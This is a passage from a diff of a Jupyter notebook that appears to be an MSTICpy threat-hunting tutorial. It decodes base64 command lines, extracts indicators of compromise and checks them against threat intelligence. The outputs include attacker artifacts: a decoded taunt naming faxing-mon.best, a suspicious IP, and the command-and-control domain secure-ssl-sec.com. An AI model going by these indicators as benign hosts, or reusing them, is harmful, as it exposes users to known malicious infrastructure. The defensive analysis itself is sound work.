+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>reference</th>\n",
+       "      <th>original_string</th>\n",
+       "      <th>file_name</th>\n",
+       "      <th>file_type</th>\n",
+       "      <th>input_bytes</th>\n",
+       "      <th>decoded_string</th>\n",
+       "      <th>encoding_type</th>\n",
+       "      <th>file_hashes</th>\n",
+       "      <th>md5</th>\n",
+       "      <th>sha1</th>\n",
+       "      <th>sha256</th>\n",
+       "      <th>printable_bytes</th>\n",
+       "      <th>src_index</th>\n",
+       "      <th>full_decoded_string</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>(, 1., 1)</td>\n",
+       "      <td>QWxsIHlvdXIgc2VydmVycyBiZWxvbmcgdG8gZmF4aW5nLW1vbi5iZXN0IG5vdy4=</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>None</td>\n",
+       "      <td>b'All your servers belong to faxing-mon.best now.'</td>\n",
+       "      <td>All your servers belong to faxing-mon.best now.</td>\n",
+       "      <td>utf-8</td>\n",
+       "      <td>{'md5': 'c0635c256fbbfb3033a08929d1f90b53', 'sha1': '797345abadcbb2383bdb700444e7a3f46d4f5600', ...</td>\n",
+       "      <td>c0635c256fbbfb3033a08929d1f90b53</td>\n",
+       "      <td>797345abadcbb2383bdb700444e7a3f46d4f5600</td>\n",
+       "      <td>05f5c87e10357fd8d720e348579fcd13f4a41dd680c1674511f06d92216a3039</td>\n",
+       "      <td>41 6c 6c 20 79 6f 75 72 20 73 65 72 76 65 72 73 20 62 65 6c 6f 6e 67 20 74 6f 20 66 61 78 69 6e ...</td>\n",
+       "      <td>c:\\windows\\system32\\cmd.exe0x1a382020-07-10 18:28:47.660000</td>\n",
+       "      <td>cmd  /c echo &lt;decoded type='string' name='[None]' index='1' depth='1'&gt;All your servers belong to...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "   reference  \\\n",
+       "8  (, 1., 1)   \n",
+       "\n",
+       "                                                    original_string file_name  \\\n",
+       "8  QWxsIHlvdXIgc2VydmVycyBiZWxvbmcgdG8gZmF4aW5nLW1vbi5iZXN0IG5vdy4=   unknown   \n",
+       "\n",
+       "  file_type                                         input_bytes  \\\n",
+       "8      None  b'All your servers belong to faxing-mon.best now.'   \n",
+       "\n",
+       "                                    decoded_string encoding_type  \\\n",
+       "8  All your servers belong to faxing-mon.best now.         utf-8   \n",
+       "\n",
+       "                                                                                           file_hashes  \\\n",
+       "8  {'md5': 'c0635c256fbbfb3033a08929d1f90b53', 'sha1': '797345abadcbb2383bdb700444e7a3f46d4f5600', ...   \n",
+       "\n",
+       "                                md5                                      sha1  \\\n",
+       "8  c0635c256fbbfb3033a08929d1f90b53  797345abadcbb2383bdb700444e7a3f46d4f5600   \n",
+       "\n",
+       "                                                             sha256  \\\n",
+       "8  05f5c87e10357fd8d720e348579fcd13f4a41dd680c1674511f06d92216a3039   \n",
+       "\n",
+       "                                                                                       printable_bytes  \\\n",
+       "8  41 6c 6c 20 79 6f 75 72 20 73 65 72 76 65 72 73 20 62 65 6c 6f 6e 67 20 74 6f 20 66 61 78 69 6e ...   \n",
+       "\n",
+       "                                                     src_index  \\\n",
+       "8  c:\\windows\\system32\\cmd.exe0x1a382020-07-10 18:28:47.660000   \n",
+       "\n",
+       "                                                                                   full_decoded_string  \n",
+       "8  cmd  /c echo <decoded type='string' name='[None]' index='1' depth='1'>All your servers belong to...  "
+      ]
+     },
+     "execution_count": 34,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "cmd_lines = p_tree.dropna(subset=['CommandLine']).copy()\n",
+    "#Base 64 decode strings in our commandlines\n",
+    "dec_df = base64.unpack_df(data=cmd_lines, column=\"CommandLine\")\n",
+    "dec_df = dec_df.dropna(subset=['decoded_string'])\n",
+    "dec_df.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## IoC Extract and Threat Intel Lookup\n",
+    "With the host process tree above we have found some activity that appears malicious. However, we'd like to do some more validation without having to manually examine each process. One simple way to do this is to look for key Indicators of Compromise (IoC) in our data and check them against threat intelligence. We use MSTICpy's `IoCExtract` to [extract known IoC types](https://msticpy.readthedocs.io/en/latest/data_analysis/IoCExtract.html). We can then use the same threat intelligence feature used earlier with a single IP address to look up multiple IoCs."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 37,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IoCType</th>\n",
+       "      <th>Observable</th>\n",
+       "      <th>SourceIndex</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>10</th>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>32.220.60.108</td>\n",
+       "      <td>c:\\windows\\system32\\ping.exe0x20482020-07-10 18:28:47.830000</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>11</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>Microsoft.Windows.Photos</td>\n",
+       "      <td>c:\\program files\\windowsapps\\microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe\\micr...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>504</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>AzureEvents.man</td>\n",
+       "      <td>c:\\windows\\system32\\wevtutil.exe0x1f682020-07-10 21:02:11.807000</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>225</th>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>4.0.0.0</td>\n",
+       "      <td>c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\ngen.exe0x14d42020-07-10 18:36:30.583000</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>microsoft.com</td>\n",
+       "      <td>c:\\windows\\system32\\cmd.exe0x26e42020-07-10 18:28:46.993000</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "    IoCType                Observable  \\\n",
+       "10     ipv4             32.220.60.108   \n",
+       "11      dns  Microsoft.Windows.Photos   \n",
+       "504     dns           AzureEvents.man   \n",
+       "225    ipv4                   4.0.0.0   \n",
+       "2       dns             microsoft.com   \n",
+       "\n",
+       "                                                                                             SourceIndex  \n",
+       "10                                          c:\\windows\\system32\\ping.exe0x20482020-07-10 18:28:47.830000  \n",
+       "11   c:\\program files\\windowsapps\\microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe\\micr...  \n",
+       "504                                     c:\\windows\\system32\\wevtutil.exe0x1f682020-07-10 21:02:11.807000  \n",
+       "225             c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\ngen.exe0x14d42020-07-10 18:36:30.583000  \n",
+       "2                                            c:\\windows\\system32\\cmd.exe0x26e42020-07-10 18:28:46.993000  "
+      ]
+     },
+     "execution_count": 37,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Extract IoCs from command lines\n",
+    "ioc_ex = IoCExtract()\n",
+    "cmd_iocs = cmd_lines.mp_ioc.extract(columns=['CommandLine'], ioc_types=['ipv4','dns'])\n",
+    "b64_iocs = dec_df.mp_ioc.extract(columns=['decoded_string'], ioc_types=['ipv4','dns'])\n",
+    "iocs = pd.concat([cmd_iocs,b64_iocs])\n",
+    "iocs = iocs.drop_duplicates(subset=['IoCType','Observable']).copy()\n",
+    "iocs.sample(5)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Similar to the alert viewer widget used earlier MSTICpy has a viewer for threat intelligence results to make reviewing the output easier.\n",
+    "> Note: The full response details from the provider can be see in the collapsible `Raw Results` section"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 36,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "2e72350bd6544c8fadfb8bd45ed09673",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<hr>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h2 style='border: 1px solid;background-color: DarkGray; padding: 6px'>secure-ssl-sec.com</h2><h3 style='background-color: SteelBlue; padding: 6px'>Type: 'dns', Provider: OTX, severity: high</h3><h4>Details</h4>\n",
+       "<style>\n",
+       "    .tb_ti_res {border-collapse: collapse; width: 60%; border: 1px solid #ddd !important;}\n",
+       "    .cell_ti {border: 1px solid #ddd !important;\n",
+       "        text-align: left !important; padding: 5px !important; height: 12px}\n",
+       "    .cell_ti_first {border: 1px solid #ddd !important; width: 25%;\n",
+       "        text-align: left !important; padding: 5px !important; height: 12px}\n",
+       "</style>\n",
+       "<table class='tb_ti_res'><tr class='cell_ti'><td class='cell_ti_first'>OTX</td><tr class='cell_ti'><td class='cell_ti_first'>pulse_count</td><td class='cell_ti'>5</td></tr><tr class='cell_ti'><td class='cell_ti_first'>names</td><td class='cell_ti'>['Malware - Malware Domain Feed V2 - June 04 2020', 'Malware - Malware Domain Feed V2 - February 10 2020', 'Cosmic Lynx: The Rise of A Russian BEC Group', 'Cosmic Lynx: The Rise of A Russian BEC Group', 'Cosmic Lynx The Rise of Russian BEC']</td></tr><tr class='cell_ti'><td class='cell_ti_first'>tags</td><td class='cell_ti'>[[], [], ['BEC', 'Phishing', 'social engineering', 'Russia', 'Email', 'COVID-19'], ['BEC', 'Phishing', 'social engineering', 'Russia', 'Email', 'COVID-19'], ['” “ corporate', '” “ matter', '” “ law', 'march', '” “ potential', '” “ new', '” “ possible', 'january', '“ corporate', '” “ liaise', 'august', 'june', 'april']]</td></tr><tr class='cell_ti'><td class='cell_ti_first'>references</td><td class='cell_ti'>[[], [], ['https://www.agari.com/cyber-intelligence-research/whitepapers/acid-agari-cosmic-lynx.pdf'], ['https://www.agari.com/cyber-intelligence-research/whitepapers/acid-agari-cosmic-lynx.pdf'], ['https://www.agari.com/cyber-intelligence-research/whitepapers/acid-agari-cosmic-lynx.pdf']]</td></tr></tr></table><h4>Reference: </h4><a href='https://otx.alienvault.com/api/v1/indicators/domain/secure-ssl-sec.com/general'>https://otx.alienvault.com/api/v1/indicators/domain/secure-ssl-sec.com/general</a><br><hr><h4>Raw Results</h4>\n",
+       "        <details>\n",
+       "        <summary> <u>Raw results from provider...</u></summary>\n",
+       "        <pre  style=\"font-size:11px\">{'alexa':&nbsp;'http://www.alexa.com/siteinfo/secure-ssl-sec.com',<br>&nbsp;'base_indicator':&nbsp;{'access_reason':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'access_type':&nbsp;'public',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'content':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;2209997916,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator':&nbsp;'secure-ssl-sec.com',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'title':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'type':&nbsp;'domain'},<br>&nbsp;'indicator':&nbsp;'secure-ssl-sec.com',<br>&nbsp;'pulse_info':&nbsp;{'count':&nbsp;5,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulses':&nbsp;[{'TLP':&nbsp;'white',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx.alienvault.com/assets/images/default-avatar.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'83138',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'otxrobottwo_testing'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-06-04T10:29:56.147000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'Command&nbsp;and&nbsp;Control&nbsp;domains&nbsp;for&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Malware.&nbsp;These&nbsp;domains&nbsp;are&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'extracted&nbsp;from&nbsp;a&nbsp;number&nbsp;of&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'sources,&nbsp;and&nbsp;are&nbsp;suspicious.',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5ed8cd24dea4063ecdd46ff0',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;1436,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{'domain':&nbsp;1104,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'hostname':&nbsp;332},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-07-20T02:27:31.705000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'16&nbsp;hours&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'Malware&nbsp;-&nbsp;Malware&nbsp;Domain&nbsp;Feed&nbsp;V2&nbsp;-&nbsp;June&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'04&nbsp;2020',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb